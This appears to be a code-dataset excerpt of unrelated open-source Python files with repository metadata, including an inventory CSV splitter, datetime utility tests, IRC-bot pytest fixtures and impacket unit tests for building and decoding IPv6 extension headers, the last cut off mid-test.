self.sock.sendto(str(self.lights), (UDP_IP, UDP_PORT))
if __name__ == '__main__':
c = Controller('disco')
|
cmcneil/convox-led
|
proto/client.py
|
Python
|
gpl-2.0
| 1,664
|
"""
Program to reverse a string and print it out
"""
def reverseString(string):
revString = []
i= len(string)-1
while i>=0:
revString.append(string[i])
i-=1
newString = ""
for i in range(len(revString)):
newString = newString + str(revString[i])
print "The reverse string is: %s" %newString
if __name__=="__main__":
print "Enter the string that you need to reverse:"
string = raw_input()
reverseString(string)
|
nbhavana/python-practice-programs
|
reverseString.py
|
Python
|
gpl-2.0
| 543
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# when fed a properly formatted csv file of sap inventory, spits out divided by page
import csv, sys
from pprint import *
arguments = sys.argv[1:]
if arguments == []:
print("This script must be passed arguments in order to function.")
sys.exit(1)
for x in arguments:
arg = str(x)
listofmodularparts = ['661-6357', '661-6856', '661-8041', '661-00020', '661-00021', '661-00022']
listofadapters = ['661-5843', '661-6365', '661-6403', '661-6536', '661-7015']
listofenvelopes = ['C661-4954', '661-6367']
modularRTW = []
adapterRTW = []
envelopeRTW = []
iPhoneRTW = []
iPodRTW = []
iPadRTW = []
with open(arg, 'r') as csvfile:
inventoryfromfile = csv.reader(csvfile)
inventory = []
deletionindex = []
for i in inventoryfromfile:
inventory.append(i)
# make list of modulars
for i, columns in enumerate(inventory):
if columns[0] in listofmodularparts:
modularRTW.append(columns[0:3])
deletionindex.append(i)
# make list of adapters
for i, columns in enumerate(inventory):
if columns[0] in listofadapters:
adapterRTW.append(columns[0:3])
deletionindex.append(i)
# make list of envelopes
for i, columns in enumerate(inventory):
if columns[0] in listofenvelopes:
envelopeRTW.append(columns[0:3])
deletionindex.append(i)
# make list of ipods
for i, columns in enumerate(inventory):
if "IPOD" in columns[2]:
iPodRTW.append(columns[0:3])
deletionindex.append(i)
# make list of iphones
for i, columns in enumerate(inventory):
if "IPHONE" in columns[2] and columns[0] not in listofmodularparts:
iPhoneRTW.append(columns[0:3])
deletionindex.append(i)
# make list of ipads
for i, columns in enumerate(inventory):
if "IPAD" in columns[2]:
iPadRTW.append(columns[0:3])
deletionindex.append(i)
deletionindex = list(set(deletionindex))
for i in reversed(deletionindex):
del inventory[i]
repairPartsInventory = inventory
def writeToFile(listname, filename):
with open(filename, 'w') as x:
writer = csv.writer(x)
writer.writerows(listname)
writeToFile(modularRTW,'Modular Parts List.csv')
writeToFile(adapterRTW,'Adapter RTW List.csv')
writeToFile(envelopeRTW, 'Envelope RTW list.csv')
writeToFile(iPhoneRTW,'iPhone RTW List.csv')
writeToFile(iPodRTW, 'iPod RTW List.csv')
writeToFile(iPadRTW, 'iPad RTW List.csv')
#for i in deletionindex:
|
chrishewlings/Projects
|
Python/Inventory Parser/sap_csv_parse.py
|
Python
|
gpl-2.0
| 2,378
|
# tests.utils_tests.timez_tests
# Tests for the timez utility package
#
# Author: Benjamin Bengfort <benjamin@bengfort.com>
# Created: Mon Nov 11 12:48:23 2013 -0500
#
# Copyright (C) 2013 Bengfort.com
# For license information, see LICENSE.txt
#
# ID: timez_tests.py [] benjamin@bengfort.com $
"""
Tests for the timez utility package
"""
##########################################################################
## Imports
##########################################################################
import unittest
from zerocycle.utils.timez import *
from dateutil.tz import tzlocal, tzutc
from datetime import datetime, timedelta
class TimezTest(unittest.TestCase):
def setUp(self):
self.localnow = datetime.now(tzlocal()).replace(microsecond=0)
self.utcnow = self.localnow.astimezone(tzutc())
def tearDown(self):
self.localnow = self.utcnow = None
def test_strptimez(self):
"""
Assert that strptimez returns a tz aware utc datetime
"""
dtfmt = "%a %b %d %H:%M:%S %Y %z"
dtstr = self.localnow.strftime(dtfmt)
self.assertEqual(strptimez(dtstr, dtfmt), self.utcnow)
def test_strptimez_no_z(self):
"""
Assert that strptimez works with no '%z'
This should return a timezone naive datetime
"""
dtfmt = "%a %b %d %H:%M:%S %Y"
dtstr = self.localnow.strftime(dtfmt)
self.assertEqual(strptimez(dtstr, dtfmt), self.localnow.replace(tzinfo=None))
def test_strptimez_no_space(self):
"""
Non-space delimited '%z' works
"""
dtfmt = "%Y-%m-%dT%H:%M:%S%z"
dtstr = self.localnow.strftime(dtfmt)
self.assertEqual(strptimez(dtstr, dtfmt), self.utcnow)
def test_begin_z(self):
"""
Test fmt that begins with '%z'
"""
dtfmt = "%z %H:%M:%S for %Y-%m-%d"
dtstr = self.localnow.strftime(dtfmt)
self.assertEqual(strptimez(dtstr, dtfmt), self.utcnow)
def test_middle_z(self):
"""
Test fmt that contains '%z'
"""
dtfmt = "time is: %H:%M:%S %z on %Y-%m-%d "
dtstr = self.localnow.strftime(dtfmt)
self.assertEqual(strptimez(dtstr, dtfmt), self.utcnow)
class ClockTest(unittest.TestCase):
def get_now_times(self):
localnow = datetime.now(tzlocal()).replace(microsecond=0)
utcnow = localnow.astimezone(tzutc())
return (localnow, utcnow)
def test_clock_localnow(self):
"""
Local time computation matches
"""
testrnow = self.get_now_times()[0].replace(second=0)
clocknow = Clock.localnow().replace(second=0,microsecond=0)
self.assertEqual(testrnow, clocknow)
def test_clock_utcnow(self):
"""
UTC time computation matches
"""
testrnow = self.get_now_times()[1].replace(second=0)
clocknow = Clock.utcnow().replace(second=0,microsecond=0)
self.assertEqual(testrnow, clocknow)
def test_local_offset(self):
"""
Assert local time is offset UTC
"""
localnow = Clock.localnow().replace(second=0, microsecond=0)
utcnow = Clock.utcnow().replace(second=0, microsecond=0)
offset = int(localnow.strftime('%z'))
delta = timedelta(hours = offset/100)
offnow = localnow - delta
self.assertEqual(offnow.replace(tzinfo=None), utcnow.replace(tzinfo=None))
def test_local_utc_diff(self):
"""
Assert local time is not UTC time
"""
localnow = Clock.localnow().replace(second=0, microsecond=0)
utcnow = Clock.utcnow().replace(second=0, microsecond=0)
if localnow.strftime('%z') == utcnow.strftime('%z'):
self.assertEqual(localnow, utcnow)
else:
self.assertNotEqual(localnow.replace(tzinfo=None), utcnow.replace(tzinfo=None))
def test_clock_format(self):
"""
Format works with fmt string
"""
fmt = "%Y-%m-%dT%H:%M:%S%z"
dts = self.get_now_times()[0]
clk = Clock()
self.assertEqual(dts.strftime(fmt), clk.format(dts, fmt))
def test_clock_simple_format(self):
"""
Test named formats
"""
fmt = "%Y-%m-%dT%H:%M:%S%z"
dts = self.get_now_times()[0]
clk = Clock()
self.assertEqual(dts.strftime(fmt), clk.format(dts, "iso"))
def test_default_format(self):
"""
Assert defaults can be passed in
"""
fmt = "%Y-%m-%dT%H:%M:%S%z"
dts = self.get_now_times()[0]
clk = Clock(default="iso")
self.assertEqual(dts.strftime(fmt), clk.format(dts))
def test_isoutc_formatter(self):
"""
Test ISO UTC formatter
"""
clk = Clock("iso", local=False)
lcl = self.get_now_times()[1]
self.assertEqual(str(clk), lcl.strftime("%Y-%m-%dT%H:%M:%S%z"))
|
tipsybear/zerocycle
|
tests/utils_tests/timez_tests.py
|
Python
|
gpl-2.0
| 4,919
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Licensed under the GNU General Public License, version 3.
# See the file http://www.gnu.org/copyleft/gpl.txt
from pisi.actionsapi import pythonmodules
#from pisi.actionsapi import pisitools
# if pisi can't find source directory, see /var/pisi/python-elib.intl/work/ and:
# WorkDir="python-elib.intl-"+ get.srcVERSION() +"/sub_project_dir/"
def build():
pythonmodules.compile()
def install():
pythonmodules.install()
# Take a look at the source folder for these file as documentation.
# pisitools.dodoc("AUTHORS", "BUGS", "ChangeLog", "COPYING", "README")
# If there is no install rule for a runnable binary, you can
# install it to binary directory.
# pisitools.dobin("python-elib.intl")
# You can use these as variables, they will replace GUI values before build.
# Package Name : python-elib.intl
# Version : 0.0.3
# Summary : Enhanced internationalization (I18N) for Python
# For more information, you can look at the Actions API
# from the Help menu and toolbar.
# By PiSiDo 2.0.0
|
pisiganesh/my_pisi_files
|
python-elib.intl/actions.py
|
Python
|
gpl-2.0
| 1,053
|
import sys
def addAll(aList, elements):
# assert type(elements) is list
# assert type(aList) is list
for e in elements:
aList.append(e)
def removeAll(aDict, elements):
# assert type(elements) is list
# assert type(aDict) is dict
for e in elements:
if e in aDict:
del aDict[e]
def byteArrayXor(result, input2):
# assert type(result) is list
# assert type(input2) is list
length = min(len(result), len(input2))
for index in range(length):
result[index] = result[index] ^ input2[index]
def getByteSize(q):
return q//8 + (1 if q % 8 != 0 else 0)
if __name__ == "__main__":
sys.path.append("../../test/testcore")
from testUtil import *
unittest.main(verbosity=2)
# # getByteSize
# q = 9
# assert 2 == getByteSize(q)
#
# # byteArrayXor
# input1 = [255, 0]
# input2 = [0, 255]
# byteArrayXor(input1, input2)
# assert input1 == [255, 255]
# input1 = [255, 255]
# input2 = [255, 255]
# #print input1
# byteArrayXor(input1, input2)
# #print input1
# assert input1 == [0, 0]
#
# # addAll simple unit test
# a = []
# addAll(a, ['b','c'])
# assert a == ['b','c']
#
# # removeAll simple unit test
# a = {'a':10, 'b':20, 'c':30}
# removeAll(a, ['a','c'])
# assert len(a) == 1
# assert a['b'] == 20, "ERROR b should be 20 , but we have %d" % a['b']
|
CSNoyes/BitAV
|
ScanningEngine/Python/BloomierFilter/core/util.py
|
Python
|
gpl-2.0
| 1,484
|
from grazyna.db import get_engine, create_database
from grazyna.test_mocks.sender import IrcSender
from grazyna.test_mocks.importer import Importer
from grazyna.request import RequestBot
from grazyna.irc.models import User
import pytest
@pytest.fixture()
def protocol():
return IrcSender()
@pytest.fixture()
def protocol_with_db():
client = IrcSender()
db_uri = client.config.get('main', 'db_uri')
client.db = get_engine(db_uri)
create_database(client.db)
return client
@pytest.fixture()
def protocol_with_importer():
client = IrcSender()
client.importer = Importer(client)
return client
@pytest.fixture
def public_bot(protocol):
return RequestBot(
protocol=protocol,
user=User('socek!a@b'),
chan='#czarnobyl',
private=False,
config={},
temp={},
)
@pytest.fixture
def public_bot_with_db(protocol_with_db):
return RequestBot(
protocol=protocol_with_db,
user=User('socek!a@b'),
chan='#czarnobyl',
private=False,
config={},
temp={},
)
@pytest.fixture
def private_bot(protocol):
return RequestBot(
protocol=protocol,
user=User('socek!a@b'),
private=True,
config={},
temp={},
)
@pytest.fixture
def bot_with_importer(protocol_with_importer):
return RequestBot(
protocol=protocol_with_importer,
user=User('socek!a@b'),
chan='#czarnobyl',
)
|
firemark/grazyna
|
conftest.py
|
Python
|
gpl-2.0
| 1,477
|
#!/usr/bin/env python
import sys
sys.path.insert(0,"../..")
#Impact test version
try:
from impacket import IP6_Address, IP6, ImpactDecoder, IP6_Extension_Headers
except:
pass
#Standalone test version
try:
import sys
sys.path.insert(0,"../..")
import IP6_Address, IP6, ImpactDecoder, IP6_Extension_Headers
except:
pass
import unittest
class TestIP6(unittest.TestCase):
def string_to_list(self, bytes):
return map(ord, list(bytes))
def test_create_simple_hop_by_hop(self):
hop_by_hop_binary_packet = [0x3a, 0x00, 0x01, 0x04, 0x00, 0x00, 0x00, 0x00]
hop_by_hop = IP6_Extension_Headers.Hop_By_Hop()
hop_by_hop.set_next_header(58)
self.assertEquals(
self.string_to_list(hop_by_hop.get_packet()), hop_by_hop_binary_packet,
"Simple Hop By Hop Header creation - Buffer mismatch")
self.assertEquals(
hop_by_hop.get_size(), len(hop_by_hop_binary_packet),
"Simple Hop By Hop Header creation - Size mismatch")
def test_simple_hop_by_hop_contained_in_ipv6(self):
ipv6_binary_packet = [
0x64, 0x82, 0x46, 0x05,
0x05, 0xdc, 0x00, 0x01,
0xfe, 0x80, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x78, 0xf8, 0x89, 0xd1,
0x30, 0xff, 0x25, 0x6b,
0xff, 0x02, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x03]
hop_by_hop_binary_packet = [
0x3a, 0x00, 0x01, 0x04,
0x00, 0x00, 0x00, 0x00]
binary_packet = ipv6_binary_packet + hop_by_hop_binary_packet
ip6_packet = IP6.IP6()
ip6_packet.set_traffic_class(72)
ip6_packet.set_flow_label(148997)
ip6_packet.set_payload_length(1500)
ip6_packet.set_next_header(17)
ip6_packet.set_hop_limit(1)
ip6_packet.set_source_address("FE80::78F8:89D1:30FF:256B")
ip6_packet.set_destination_address("FF02::1:3")
hop_by_hop = IP6_Extension_Headers.Hop_By_Hop()
hop_by_hop.set_next_header(58)
ip6_packet.contains(hop_by_hop)
self.assertEquals(
self.string_to_list(ip6_packet.get_packet()), binary_packet,
"IP6 Hop By Hop Header contained in IPv6 Header - Buffer mismatch")
self.assertEquals(
ip6_packet.get_size(), len(binary_packet),
"IP6 Hop By Hop Header contained in IPv6 Header - Size mismatch")
def test_add_option_to_hop_by_hop(self):
hop_by_hop_binary_packet = [
0x3a, 0x01, 0x01, 0x0C,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00]
hop_by_hop = IP6_Extension_Headers.Hop_By_Hop()
hop_by_hop.set_next_header(58)
hop_by_hop.add_option(IP6_Extension_Headers.Option_PADN(14))
self.assertEquals(
self.string_to_list(hop_by_hop.get_packet()), hop_by_hop_binary_packet,
"Add Option to Hop By Hop Header - Buffer mismatch")
self.assertEquals(
hop_by_hop.get_size(), len(hop_by_hop_binary_packet),
"Add Option to Hop By Hop Header - Size mismatch")
def test_pad_hop_by_hop_when_adding_option(self):
hop_by_hop_binary_packet = [
0x3a, 0x00, 0x00, 0x01,
0x03, 0x00, 0x00, 0x00]
hop_by_hop = IP6_Extension_Headers.Hop_By_Hop()
hop_by_hop.set_next_header(58)
hop_by_hop.add_option(IP6_Extension_Headers.Option_PAD1())
self.assertEquals(
self.string_to_list(hop_by_hop.get_packet()), hop_by_hop_binary_packet,
"Pad Hop By Hop Header when adding option - Buffer mismatch")
self.assertEquals(
hop_by_hop.get_size(), len(hop_by_hop_binary_packet),
"Pad Hop By Hop Header when adding option - Size mismatch")
def test_create_simple_dest_opts(self):
dest_opts_binary_packet = [0x3a, 0x00, 0x01, 0x04, 0x00, 0x00, 0x00, 0x00]
dest_opts = IP6_Extension_Headers.Destination_Options()
dest_opts.set_next_header(58)
self.assertEquals(
self.string_to_list(dest_opts.get_packet()), dest_opts_binary_packet,
"Simple Destination Options Header creation - Buffer mismatch")
self.assertEquals(
dest_opts.get_size(), len(dest_opts_binary_packet),
"Simple Destination Options Header creation - Size mismatch")
def test_simple_dest_opts_contained_in_ipv6(self):
ipv6_binary_packet = [
0x64, 0x82, 0x46, 0x05,
0x05, 0xdc, 0x3c, 0x01,
0xfe, 0x80, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x78, 0xf8, 0x89, 0xd1,
0x30, 0xff, 0x25, 0x6b,
0xff, 0x02, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x03]
dest_opts_binary_packet = [
0x3a, 0x00, 0x01, 0x04,
0x00, 0x00, 0x00, 0x00]
binary_packet = ipv6_binary_packet + dest_opts_binary_packet
ip6_packet = IP6.IP6()
ip6_packet.set_traffic_class(72)
ip6_packet.set_flow_label(148997)
ip6_packet.set_payload_length(1500)
ip6_packet.set_next_header(17)
ip6_packet.set_hop_limit(1)
ip6_packet.set_source_address("FE80::78F8:89D1:30FF:256B")
ip6_packet.set_destination_address("FF02::1:3")
dest_opts = IP6_Extension_Headers.Destination_Options()
dest_opts.set_next_header(58)
ip6_packet.contains(dest_opts)
self.assertEquals(
self.string_to_list(ip6_packet.get_packet()), binary_packet,
"IP6 Destination Options Header contained in IPv6 Header - Buffer mismatch")
self.assertEquals(
ip6_packet.get_size(), len(binary_packet),
"IP6 Destination Options Header contained in IPv6 Header - Size mismatch")
def test_add_option_to_dest_opts(self):
dest_opts_binary_packet = [
0x3a, 0x01, 0x01, 0x0C,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00]
dest_opts = IP6_Extension_Headers.Destination_Options()
dest_opts.set_next_header(58)
dest_opts.add_option(IP6_Extension_Headers.Option_PADN(14))
self.assertEquals(
self.string_to_list(dest_opts.get_packet()), dest_opts_binary_packet,
"Add Option to Destination Options Header - Buffer mismatch")
self.assertEquals(
dest_opts.get_size(), len(dest_opts_binary_packet),
"Add Option to Destination Options Header - Size mismatch")
def test_pad_dest_opts_when_adding_option(self):
dest_opts_binary_packet = [
0x3a, 0x00, 0x00, 0x01,
0x03, 0x00, 0x00, 0x00]
dest_opts = IP6_Extension_Headers.Destination_Options()
dest_opts.set_next_header(58)
dest_opts.add_option(IP6_Extension_Headers.Option_PAD1())
self.assertEquals(
self.string_to_list(dest_opts.get_packet()), dest_opts_binary_packet,
"Pad Destination Options Header when adding option - Buffer mismatch")
self.assertEquals(
dest_opts.get_size(), len(dest_opts_binary_packet),
"Pad Destination Options Header when adding option - Size mismatch")
def test_create_simple_routing_options(self):
routing_options_binary_packet = [0x3a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]
routing_options = IP6_Extension_Headers.Routing_Options()
routing_options.set_next_header(58)
self.assertEquals(
self.string_to_list(routing_options.get_packet()), routing_options_binary_packet,
"Simple Routing Options Header creation - Buffer mismatch")
self.assertEquals(
routing_options.get_size(), len(routing_options_binary_packet),
"Simple Routing Options Header creation - Size mismatch")
def test_simple_routing_options_contained_in_ipv6(self):
ipv6_binary_packet = [
0x64, 0x82, 0x46, 0x05,
0x05, 0xdc, 0x2b, 0x01,
0xfe, 0x80, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x78, 0xf8, 0x89, 0xd1,
0x30, 0xff, 0x25, 0x6b,
0xff, 0x02, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x03]
routing_options_binary_packet = [
0x3a, 0x00, 0x00, 0x0a,
0x00, 0x00, 0x00, 0x00]
binary_packet = ipv6_binary_packet + routing_options_binary_packet
ip6_packet = IP6.IP6()
ip6_packet.set_traffic_class(72)
ip6_packet.set_flow_label(148997)
ip6_packet.set_payload_length(1500)
ip6_packet.set_next_header(17)
ip6_packet.set_hop_limit(1)
ip6_packet.set_source_address("FE80::78F8:89D1:30FF:256B")
ip6_packet.set_destination_address("FF02::1:3")
routing_options = IP6_Extension_Headers.Routing_Options()
routing_options.set_next_header(58)
routing_options.set_routing_type(0)
routing_options.set_segments_left(10)
ip6_packet.contains(routing_options)
self.assertEquals(
self.string_to_list(ip6_packet.get_packet()), binary_packet,
"IP6 Hop By Hop Header contained in IPv6 Header - Buffer mismatch")
self.assertEquals(
ip6_packet.get_size(), len(binary_packet),
"IP6 Hop By Hop Header contained in IPv6 Header - Size mismatch")
def test_chained_basic_options(self):
dest_opts_binary_packet = [
0x2b, 0x00, 0x00, 0x01,
0x03, 0x00, 0x00, 0x00]
routing_options_binary_packet = [
0x00, 0x00, 0x00, 0x0a,
0x00, 0x00, 0x00, 0x00]
hop_by_hop_binary_packet = [
0x3a, 0x01, 0x01, 0x0C,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00]
binary_packet = dest_opts_binary_packet + routing_options_binary_packet + hop_by_hop_binary_packet
dest_opts = IP6_Extension_Headers.Destination_Options()
dest_opts.add_option(IP6_Extension_Headers.Option_PAD1())
routing_options = IP6_Extension_Headers.Routing_Options()
routing_options.set_next_header(58)
routing_options.set_routing_type(0)
routing_options.set_segments_left(10)
hop_by_hop = IP6_Extension_Headers.Hop_By_Hop()
hop_by_hop.add_option(IP6_Extension_Headers.Option_PADN(14))
dest_opts.contains(routing_options)
routing_options.contains(hop_by_hop)
hop_by_hop.set_next_header(58)
self.assertEquals(
self.string_to_list(dest_opts.get_packet()), binary_packet,
"Chained options - Buffer mismatch")
self.assertEquals(
dest_opts.get_size(), len(binary_packet),
"Chained options - Size mismatch")
def test_chained_basic_options_inside_ipv6_packet(self):
ipv6_binary_packet = [
0x64, 0x82, 0x46, 0x05,
0x05, 0xdc, 0x00, 0x01,
0xfe, 0x80, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x78, 0xf8, 0x89, 0xd1,
0x30, 0xff, 0x25, 0x6b,
0xff, 0x02, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x03]
hop_by_hop_binary_packet = [
0x2b, 0x01, 0x01, 0x0C,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00]
routing_options_binary_packet = [
0x3c, 0x00, 0x00, 0x0a,
0x00, 0x00, 0x00, 0x00]
dest_opts_binary_packet = [
0x3a, 0x00, 0x00, 0x01,
0x03, 0x00, 0x00, 0x00]
binary_packet = ipv6_binary_packet + hop_by_hop_binary_packet + routing_options_binary_packet + dest_opts_binary_packet
ip6_packet = IP6.IP6()
ip6_packet.set_traffic_class(72)
ip6_packet.set_flow_label(148997)
ip6_packet.set_payload_length(1500)
ip6_packet.set_next_header(17)
ip6_packet.set_hop_limit(1)
ip6_packet.set_source_address("FE80::78F8:89D1:30FF:256B")
ip6_packet.set_destination_address("FF02::1:3")
hop_by_hop = IP6_Extension_Headers.Hop_By_Hop()
hop_by_hop.add_option(IP6_Extension_Headers.Option_PADN(14))
routing_options = IP6_Extension_Headers.Routing_Options()
routing_options.set_next_header(58)
routing_options.set_routing_type(0)
routing_options.set_segments_left(10)
dest_opts = IP6_Extension_Headers.Destination_Options()
dest_opts.add_option(IP6_Extension_Headers.Option_PAD1())
ip6_packet.contains(hop_by_hop)
hop_by_hop.contains(routing_options)
routing_options.contains(dest_opts)
dest_opts.set_next_header(58)
self.assertEquals(
self.string_to_list(ip6_packet.get_packet()), binary_packet,
"Chained options inside an IPv6 packet - Buffer mismatch")
self.assertEquals(
ip6_packet.get_size(), len(binary_packet),
"Chained options inside an IPv6 packet - Size mismatch")
def test_decoding_simple_hop_by_hop(self):
hop_by_hop_binary_packet = [
0x2b, 0x01, 0x01, 0x0C,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00]
d = ImpactDecoder.HopByHopDecoder()
parsed_packet = d.decode(hop_by_hop_binary_packet)
next_header = parsed_packet.get_next_header()
header_extension_length = parsed_packet.get_header_extension_length()
options = parsed_packet.get_options()
self.assertEquals(1, len(options), "Simple Hop By Hop Parsing - Wrong Quantity of Options")
padn_option = options[0]
padn_option_type = padn_option.get_option_type()
padn_option_length = padn_option.get_option_length()
self.assertEquals(parsed_packet.get_header_type(), 0, "Simple Hop By Hop Parsing - Incorrect packet")
self.assertEquals(next_header, 43, "Simple Hop By Hop Parsing - Incorrect next header value")
self.assertEquals(header_extension_length, 1, "Simple Hop By Hop Parsing - Incorrect size")
self.assertEquals(padn_option_type, 1, "Simple Hop By Hop Parsing - Incorrect option type")
self.assertEquals(padn_option_length, 12, "Simple Hop By Hop Parsing - Incorrect option size")
def test_decoding_multi_option_hop_by_hop(self):
hop_by_hop_binary_packet = [
0x3a, 0x00, 0x00, 0x01,
0x03, 0x00, 0x00, 0x00]
d = ImpactDecoder.HopByHopDecoder()
parsed_packet = d.decode(hop_by_hop_binary_packet)
next_header = parsed_packet.get_next_header()
header_extension_length = parsed_packet.get_header_extension_length()
options = parsed_packet.get_options()
self.assertEquals(2, len(options), "Simple Hop By Hop Parsing - Wrong Quantity of Options")
pad1_option = options[0]
pad1_option_type = pad1_option.get_option_type()
padn_option = options[1]
padn_option_type = padn_option.get_option_type()
padn_option_length = padn_option.get_option_length()
self.assertEquals(parsed_packet.get_header_type(), 0, "Hop By Hop with multiple options parsing - Incorrect packet")
self.assertEquals(next_header, 58, "Hop By Hop with multiple options parsing - Incorrect next header value")
self.assertEquals(header_extension_length, 0, "Hop By Hop with multiple options parsing - Incorrect size")
self.assertEquals(pad1_option_type, 0, "Hop By Hop with multiple options parsing - Incorrect option type")
self.assertEquals(padn_option_type, 1, "Hop By Hop with multiple options parsing - Incorrect option type")
self.assertEquals(padn_option_length, 3, "Hop By Hop with multiple options parsing - Incorrect option size")
def test_decoding_simple_destination_options(self):
destination_options_binary_packet = [
0x2b, 0x01, 0x01, 0x0C,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00]
d = ImpactDecoder.DestinationOptionsDecoder()
parsed_packet = d.decode(destination_options_binary_packet)
next_header = parsed_packet.get_next_header()
header_extension_length = parsed_packet.get_header_extension_length()
options = parsed_packet.get_options()
self.assertEquals(1, len(options), "Simple Destination Options Parsing - Wrong Quantity of Options")
padn_option = options[0]
padn_option_type = padn_option.get_option_type()
padn_option_length = padn_option.get_option_length()
self.assertEquals(parsed_packet.get_header_type(), 60, "Simple Destination Options Parsing - Incorrect packet")
self.assertEquals(next_header, 43, "Simple Destination Options Parsing - Incorrect next header value")
self.assertEquals(header_extension_length, 1, "Simple Destination Options Parsing - Incorrect size")
self.assertEquals(padn_option_type, 1, "Simple Destination Options Parsing - Incorrect option type")
self.assertEquals(padn_option_length, 12, "Simple Destination Options Parsing - Incorrect option size")
def test_decoding_multi_option_destination_options(self):
destination_options_binary_packet = [
0x3a, 0x00, 0x00, 0x01,
0x03, 0x00, 0x00, 0x00]
d = ImpactDecoder.DestinationOptionsDecoder()
parsed_packet = d.decode(destination_options_binary_packet)
next_header = parsed_packet.get_next_header()
header_extension_length = parsed_packet.get_header_extension_length()
options = parsed_packet.get_options()
self.assertEquals(2, len(options), "Destination Options with multiple options parsing - Wrong Quantity of Options")
pad1_option = options[0]
pad1_option_type = pad1_option.get_option_type()
padn_option = options[1]
padn_option_type = padn_option.get_option_type()
padn_option_length = padn_option.get_option_length()
self.assertEquals(parsed_packet.get_header_type(), 60, "Destination Options with multiple options parsing - Incorrect packet")
self.assertEquals(next_header, 58, "Destination Options with multiple options parsing - Incorrect next header value")
self.assertEquals(header_extension_length, 0, "Destination Options with multiple options parsing - Incorrect size")
self.assertEquals(pad1_option_type, 0, "Destination Options with multiple options parsing - Incorrect option type")
self.assertEquals(padn_option_type, 1, "Destination Options with multiple options parsing - Incorrect option type")
self.assertEquals(padn_option_length, 3, "Destination Options with multiple options parsing - Incorrect option size")
def test_decoding_simple_routing_options(self):
routing_options_binary_packet = [0x3a, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x00, 0x00]
d = ImpactDecoder.RoutingOptionsDecoder()
parsed_packet = d.decode(routing_options_binary_packet)
next_header = parsed_packet.get_next_header()
header_extension_length = parsed_packet.get_header_extension_length()
routing_type = parsed_packet.get_routing_type()
segments_left = parsed_packet.get_segments_left()
options = parsed_packet.get_options()
self.assertEquals(parsed_packet.get_header_type(), 43, "Simple Routing Options Parsing - Incorrect packet")
self.assertEquals(next_header, 58, "Simple Routing Options Parsing - Incorrect next header value")
self.assertEquals(header_extension_length, 0, "Simple Routing Options Parsing - Incorrect size")
self.assertEquals(routing_type, 0, "Simple Routing Options Parsing - Incorrect routing type")
self.assertEquals(segments_left, 10, "Simple Routing Options Parsing - Incorrect quantity of segments left size")
self.assertEquals(0, len(options), "Simple Routing Options Parsing - Wrong Quantity of Options")
def test_decoding_chained_basic_options_inside_ipv6_packet(self):
ipv6_binary_packet = [
0x64, 0x82, 0x46, 0x05,
0x05, 0xdc, 0x00, 0x01,
0xfe, 0x80, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x78, 0xf8, 0x89, 0xd1,
0x30, 0xff, 0x25, 0x6b,
0xff, 0x02, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x03]
hop_by_hop_binary_packet = [
0x2b, 0x01, 0x01, 0x0C,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00]
routing_options_binary_packet = [
0x3c, 0x00, 0x00, 0x0a,
0x00, 0x00, 0x00, 0x00]
dest_opts_binary_packet = [
0x3a, 0x00, 0x00, 0x01,
0x03, 0x00, 0x00, 0x00]
binary_packet = ipv6_binary_packet + hop_by_hop_binary_packet + routing_options_binary_packet + dest_opts_binary_packet
d = ImpactDecoder.IP6Decoder()
parsed_ipv6_packet = d.decode(binary_packet)
# IPv6 Parsing
ipv6_protocol_version = parsed_ipv6_packet.get_protocol_version()
ipv6_traffic_class = parsed_ipv6_packet.get_traffic_class()
ipv6_flow_label = parsed_ipv6_packet.get_flow_label()
ipv6_payload_length = parsed_ipv6_packet.get_payload_length()
ipv6_next_header = parsed_ipv6_packet.get_next_header()
ipv6_hop_limit = parsed_ipv6_packet.get_hop_limit()
ipv6_source_address = parsed_ipv6_packet.get_source_address()
ipv6_destination_address = parsed_ipv6_packet.get_destination_address()
# Hop By Hop Parsing
hop_by_hop_parsed_packet = parsed_ipv6_packet.child()
hop_by_hop_next_header = hop_by_hop_parsed_packet.get_next_header()
hop_by_hop_header_extension_length = hop_by_hop_parsed_packet.get_header_extension_length()
hop_by_hop_options = hop_by_hop_parsed_packet.get_options()
self.assertEquals(1, len(hop_by_hop_options), "Hop By Hop Parsing - Wrong Quantity of Options")
hop_by_hop_padn_option = hop_by_hop_options[0]
hop_by_hop_padn_option_type = hop_by_hop_padn_option.get_option_type()
hop_by_hop_padn_option_length = hop_by_hop_padn_option.get_option_length()
# Routing Options Tests
routing_options_parsed_packet = hop_by_hop_parsed_packet.child()
routing_options_next_header = routing_options_parsed_packet.get_next_header()
routing_options_header_extension_length = routing_options_parsed_packet.get_header_extension_length()
routing_options_routing_type = routing_options_parsed_packet.get_routing_type()
